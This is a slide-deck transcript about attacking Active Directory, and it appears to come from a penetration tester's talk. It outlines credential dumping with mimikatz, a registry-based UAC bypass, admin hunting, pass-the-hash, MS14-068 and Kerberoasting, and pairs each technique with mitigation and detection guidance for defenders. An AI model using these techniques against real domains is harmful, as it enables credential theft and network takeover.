Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 

Similar to Attacker's Perspective of Active Directory

EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
FaithWestdorp
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
Zach Grace
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
Paranoia 2018: A Process is No One
Paranoia 2018: A Process is No OneParanoia 2018: A Process is No One
Paranoia 2018: A Process is No One
Jared Atkinson
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Red Team P2.pdf
Red Team P2.pdfRed Team P2.pdf
Red Team P2.pdf
soheil hashemi
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
CONFidence 2014: Yaniv Miron: ATMs – We kick their ass
CONFidence 2014: Yaniv Miron: ATMs – We kick their assCONFidence 2014: Yaniv Miron: ATMs – We kick their ass
CONFidence 2014: Yaniv Miron: ATMs – We kick their ass
PROIDEA
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsThe Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security Analytics
Demetrio Milea
 
Track 5 session 2 - st dev con 2016 - security iot best practices
Track 5 session 2 - st dev con 2016 - security iot best practicesTrack 5 session 2 - st dev con 2016 - security iot best practices
Track 5 session 2 - st dev con 2016 - security iot best practices
ST_World
 
Pki 201 Key Management
Pki 201 Key ManagementPki 201 Key Management
Pki 201 Key ManagementNCC Group
 
20-security.ppt
20-security.ppt20-security.ppt
20-security.ppt
ajajkhan16
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
eightbit
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
Rishabha Garg
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Xavier Ashe
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Заполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не оконченаЗаполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не окончена
Positive Hack Days
 

Similar to Attacker's Perspective of Active Directory (20)

EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
Paranoia 2018: A Process is No One
Paranoia 2018: A Process is No OneParanoia 2018: A Process is No One
Paranoia 2018: A Process is No One
 
Dominique
DominiqueDominique
Dominique
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
Red Team P2.pdf
Red Team P2.pdfRed Team P2.pdf
Red Team P2.pdf
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
CONFidence 2014: Yaniv Miron: ATMs – We kick their ass
CONFidence 2014: Yaniv Miron: ATMs – We kick their assCONFidence 2014: Yaniv Miron: ATMs – We kick their ass
CONFidence 2014: Yaniv Miron: ATMs – We kick their ass
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsThe Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security Analytics
 
Track 5 session 2 - st dev con 2016 - security iot best practices
Track 5 session 2 - st dev con 2016 - security iot best practicesTrack 5 session 2 - st dev con 2016 - security iot best practices
Track 5 session 2 - st dev con 2016 - security iot best practices
 
Pki 201 Key Management
Pki 201 Key ManagementPki 201 Key Management
Pki 201 Key Management
 
20-security.ppt
20-security.ppt20-security.ppt
20-security.ppt
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Заполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не оконченаЗаполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не окончена
 

Recently uploaded

Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
UiPathCommunity
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 

Recently uploaded (20)

Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 

Attacker's Perspective of Active Directory

  • 1. Attacker’s Perspective of Active Directory Sunny Neo 1
  • 2. whoami •Penetration Tester •Disclaimer: All opinions are all mine, not representation of the company I work for or organizations I am affiliated with •None of these materials are original. They are just a compilation of researches done by awesome people •Test all recommendations first, before implementing them. I take no liability if they mess up your environment 2
  • 3. Shout Out •Sean Metcalf (@PyroTek3) for running https://adsecurity.org •Will Schroeder (@harmj0y) for developing and releasing tools for Modern Red Teaming (Empire, PowerSploit, Veil-Framework, Bloodhound) •Benjamin Delpy (@gentilkiwi) for mimikatz and continuously improving it •And Everyone else who contributed! 3
  • 4. Defender’s Dilemma •Cliché •Attackers just need to win once •Defenders need to win all the time 4
  • 5. Attacker’s Dilemma •The new cliché •Attackers need to evade all detection •Defenders just need one alarm/trigger to know attackers are in •“Defender's Dilemma vs Intruder's Dilemma” – TaoSecurity (2009) 5
  • 6. Assume Breach Mentality •Prepare for threats beyond the WALL (Defence in Depth / Layered Defence) – CYBER RESILIENCE •Contain threats (Limit the attacker’s movement) •Detect & Respond to threats (Threat Hunting / IOC) – CYBER AGILITY •Prevention is still important but critical to move beyond it 6
  • 7. Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) Source: https://attack.mitre.org/wiki/Main_Page 7 Red Team’s Tactics, Techniques and Procedures (TTPs)
  • 8. Active Directory •Microsoft’s Directory Service (AD DS)– A set of services to manage network resources •Domain Controller (DC) – Server running AD DS •Domain Admin (DA) – The User Group that has full control of network resources in the Domain •Local Administrators – The User Group that has full control for Local/Specific Machine 8
  • 9. Windows Authentications •NTLM Authentication • Challenge-Response Protocol •Kerberos •Single Sign On (SSO) 9
  • 12. Kerberos Authentication • Ticket Granting Ticket (TGT) contains • Privilege Attribute Certificate (PAC) stores • Account Name • Security Identifiers • Group Membership • User requests for TGT by sending timestamp that is encrypted with his secret key (NTLM Hash for RC4 cipher) • TGT is encrypted and its PAC is signed by domainKRBTGT’s secret key (NTLM Hash) – Only readable by Domain Controller (DC) • Service ticket issued by Ticket Granting Service (TGS) is encrypted by service account ’s secret key (NTLM Hash) 12
  • 15. Privilege Escalation: User to Local Admin •Unpatched Vulnerabilities •System Misconfigurations • Passwords stored in SYSVOL or Group Policy Preference (GPP) •Check out Paul Craig’s talk on Local Privilege Escalation http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-p rivilege-escalation-nus-greyhats or https://pentest.blog/windows-privilege-escalation-methods-for-pent esters/ 15
  • 16. Passwords stored in SYSVOL •SYSVOL • Domain-wide shared folder • Stores logon scripts, domain group policies • Any authenticated user on the domain can access it •Scripts with cleartext admin credentials stored in SYSVOL 16
  • 17. Passwords stored in SYSVOL •Group Policy with Password defined for Local Administrator account 17
  • 18. Passwords stored in SYSVOL •Encryption key is well known 18 Source: https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
  • 19. Passwords stored in SYSVOL 19
  • 20. Passwords stored in SYSVOL Mitigation & Detection •Install KB2962486 to disable new credentials from being stored in GPP and Delete existing XMLs/Group Policies •Plant a XML with “Password” in SYSVOL •Configure SACL on the XML to audit for access 20
  • 21. Why do we need Local Privilege Escalation? 21
  • 22. Why do we need to Privilege Escalate? •Gain access to implicit trust relationship artifacts •Assume artifacts found on one machine could be used to access other machines •More Information: http://foofus.net/goons/hinge/presos/insidious-implicit-windows-tru st-relationships.pdf 22
  • 23. Dump Implicit Trust Relationship Artifacts •Dump & Crack Local Accounts’ Hashes (Hashes == Passwords) •Dump Credentials in memory •Dump Kerberos Tickets •Dump Access Tokens 23
  • 24. Dump Credentials in memory (mimikatz) 24 •Single Sign On experience ☺
  • 25. Dump Credentials Mitigation • Audit for misconfigurations that can lead to privilege escalation with windows-privesc-check (https://github.com/pentestmonkey/windows-privesc-check) or Powerup (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) • Install KB2871997 on Windows 7, 8, Server 2008 and 2012 • Deploy Application Whitelisting (Applocker & Device Guard) • Get rid of Windows 2003 Server • Have different trust levels for machines – Domain Admin should not log on to machines with lower Trust Level 25
  • 26. Dump Credentials Detection •Monitor Registry Value for “UseLogonCredential” at HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurity ProvidersWdigest •Value: “1” to enable cleartext password to be stored in LSASS •Honey Credentials 26
  • 27. Dump Credentials Detection (Not a good idea) ● Detect mimikatz in memory using Sysmon (Be careful of performance impact) ● Look for loading of ○ C:WindowsSystem32WinSCard.dll ○ C:WindowsSystem32cryptdll.dll ○ C:WindowsSystem32hid.dll ○ C:WindowsSystem32samlib.dll ○ C:WindowsSystem32vaultcli.dll ● LSA Protection Enabled - mimidrv.sys (mimikatz’s driver to turn off LSA Protection) ● More information: https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTK B_V1J5ow ← Sysmon Tutorial https://medium.com/@lennartkoopmann/explaining-and-adapting-tays-sysmon-configuration-27d9719a89a8#.c8sokq3nj https://cyberwardog.blogspot.sg/2017/03/chronicles-of-threat-hunter-hunting-for.html 27
  • 28. Dump Credentials Detection 28Source https://twitter.com/markrussinovich/status/830997478182785024
  • 29. Dump Credentials Detection Bypass 29 Source: https://twitter.com/raka_baraka/status/831040028436525056
  • 30. User Account Control (UAC) is Enabled! •UAC is introduced since Windows Vista •Run processes as standard user rights even if user is in Administrators group unless explicit permission is given 30
  • 31. UAC Bypass • Old School • Privilege File Copy (IFile Operation COM) • DLL Hijacking • Auto-elevation • New School • Fileless UAC Bypass via Registry Hijacking • Write to HKCUSoftwareClassesmscfileshell opencommand • Launch eventvwr.exe 31 • More information: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hij acking/ https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-s hould-know/
  • 32. UAC Bypass Mitigation & Detection • Reduce Users with Administrator Privilege • Set UAC level to “Always Notify” instead of Default configuration (can be bypassed with Disk Clean up) • Monitor Registry entry “HKCUSoftwareClassesmscfileshellopencommand” • More information: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-di sk-cleanup/ 32
  • 33. Situational Awareness • Port Scan • DNS Enumeration (SRV records, *._tcp.domain.com) • Password / Hash Spray • Service Principal Name (SPN) Scanning • Domain Enumeration & Admin Hunting • BloodHound 33
  • 34. Password / Hash Spray •Quick and dirty way to identify access across the network •Good for pen test that doesn’t require stealth 34
  • 35. Service Principal Name (SPN) Scanning •SPN is used to uniquely identify service instances for Kerberos Authentication •Gather services across the domain (Without a Single Port Scanned!) 35
  • 36. Service Principal Name (SPN) Scanning •PowerShell scripts from Sean Metacalf https://github.com/PyroTek3/PowerShell-AD-Recon •Comprehensive List of SPN http://adsecurity.org/?page_id=183 •How SPN is used by Kerberos http://social.technet.microsoft.com/wiki/contents/articles/717.servic e-principal-names-spns-setspn-syntax-setspn-exe.aspx 36
  • 39. Domain Enumeration with PowerView •PowerView • Based on PowerShell • Capitalize on PowerShell alternatives for “NET” command • Capitalize on Win32 API • Gain network situational awareness •More Information: https://github.com/PowerShellMafia/PowerSploit/tree/master/Reco n 39
  • 40. Domain Enumeration with PowerView 40
  • 41. Domain Enumeration with PowerView 41
  • 42. Domain Enumeration with PowerView 42
  • 43. Domain Enumeration with PowerView 43
  • 44. Admin Hunting with PowerView • Implicit trust relationship • Look at where the current user has Local Administrators Right • Look for where privilege users are logged on to • Target machines with privilege users • Steal their tokens / credentials • Profit! 44
  • 45. Admin Hunting with PowerView 45 • Invoke-UserHunter • Get a list of hosts from AD • Get a list of users of a specific Domain Group (Domain Admins/Local Administrators) • Run NetSessionEnum (User Sessions) and NetWkstaUserNum (Logged On Users) with information gathered • (Optionally) Check if current user has Local Administrators right on each host • More Information http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20 http://www.slideshare.net/harmj0y/i-have-the-powerview
  • 46. Admin Hunting with PowerView 46Source: http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20
  • 47. Admin Hunting with PowerView 47
  • 48. BloodHound • Provide a graphical representation of attack path based on information gathered via customized PowerView • Simplify Admin Hunting across the Network to achieve Derivative Local Admin • More information https://wald0.com/?p=14 http://www.slideshare.net/AndyRobbins3/six-degrees-of-domain-admin-bl oodhound-at-def-con-24 https://github.com/BloodHoundAD/BloodHound/wiki 48
  • 49. BloodHound 49Source: Raphael Mudge – BloodHound - Analyzing Active Directory Trust Relationships https://www.youtube.com/watch?v=gOpsLiJFI1o
  • 50. Domain Enumeration Mitigation •Use Net Cease to modify NetSessionEnum default permission https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dc b5b •Upgrade to Windows 10 and Windows Server 2016 •Use SAMRi10 to restrict Remote SAM Query(>=Win 10 & Server 2016) https://www.bleepingcomputer.com/news/security/microsoft-resear chers-release-anti-reconnaissance-tool-named-samri10/ 50
  • 51. Lateral Movement • Reuse cleartext credentials (Not working well after KB2871997) • Pass the Hash (Not working well after KB2871997) • Pass the Key (Overpass-the-hash) • Impersonate Tokens • Pass the Ticket • Kerberoasting 51
  • 52. Pass the Hash (PtH) 52 Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
  • 53. Pass the Hash (PtH) •Not working well after KB2871997 •Local accounts cannot login remotely •PtH still possible for • Default Local Administrator (RID 500) hash • Domain hashes 53
  • 54. Pass the Key (Overpass the Hash) •KB2871997 stops Windows from storing cleartext credentials in memory (LSASS) •NTLM Hashes/(e)Keys are still stored in memory (SSO) •Remember how Kerberos ticket request is done? 54
  • 55. Kerberos Authentication Recap 55 Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
  • 57. Pass the Key (Overpass the Hash) •User’s secret key is dependent on the cipher used •Exploit Steps • Privilege Escalate to Local Admin • Dump Hashes/(e)Keys • Create a new process and Inject stolen hash/(e)key into memory • SSO will refer to the Injected secret key in memory • Impersonate Token of newly created Process • Win! 57
  • 58. Pass the Key (Overpass the Hash) 58 •User “labgg” is Domain Admin logged in on Compromised Machine
  • 59. Pass the Key (Overpass the Hash) 59
  • 60. Pass the Key (Overpass the Hash) 60 •Some bug with Empire’s “shell” command so switched it to Meterpreter
  • 61. Pass the Key (Overpass the Hash) 61 More Information: http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/ http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
  • 62. Pass the Ticket •Export Ticket-Granting-Ticket (TGT) from memory of a compromised Host •Import the TGT into Attacker’s Machine •Profit! 62
  • 63. Pass the Ticket with MS14-068 •MS014-068 • Privilege escalation for Authenticated Domain User to Domain Admin by forging PAC • PAC stores Authorization Data (Group Membership, Security Identifier) • Improper validation of the Privilege Attribute Certificate (PAC) Signature 63
  • 64. Pass the Ticket with MS14-068 64 More Information: https://labs.mwrinfosecurity.com/blog/digging-into-ms14-068-exploitation-and-defence/ https://www.trustedsec.com/december-2014/ms14-068-full-compromise-step-step/ https://github.com/bidord/pykek/
  • 65. Pass the Ticket with MS14-068 65
  • 66. Kerberoasting •Service Ticket can be obtained without actually using it •Service Ticket issued by TGS is encrypted with target service’s account secret key •Service Accounts are usually privilege accounts on the domain 66
  • 67. Kerberoasting •Why not just crack it? • Offline Attack without contacting the Target Service’s Machine 67 Source: https://adsecurity.org/?p=2293
  • 70. Kerberoasting Mitigation •Use password with >=25 characters for Service Accounts •Use Managed Service Accounts •More Information: https://adsecurity.org/?p=2293 https://technet.microsoft.com/en-us/library/dd548356(v=ws.10).aspx 70
  • 71. Kerberoasting Detection •Audit “Audit Kerberos Service Ticket Operations” on Success •Look for Event 4769 and Ticket Option: 0x40810000 and Ticket Encryption type: RC4 (0x17/0x18) •Create Honey Service ☺ •More information: https://adsecurity.org/?p=3458 https://adsecurity.org/?p=3513 71
  • 72. Lateral Movement Mitigation • Deploy Microsoft LAPS on Servers and Workstations to manage Local Administrator Passwords • Deploy Group Policy: “Deny access to this computer from the network” & “Deny log on through Remote Desktop Services” for “Local account and member of Administrators group” or “*S-1-5-114” [Block RID 500 accounts] • Add Users with High Privileges to “Protected User” Group if possible • Network Segmentation – It’s always about the Trust Path • Restrict Workstation to Workstation Communication with GPO – Windows Firewall • More Information: https://adsecurity.org/?p=3299 https://adsecurity.org/?p=3377 https://technet.microsoft.com/en-us/library/dn466518.aspx 72
  • 73. Lateral Movement Mitigation • Different Tiers of Administrators for Different Tiers of Servers & Workstations 73 More Information: https://technet.microsoft.com/en-us/library/mt631193.aspx
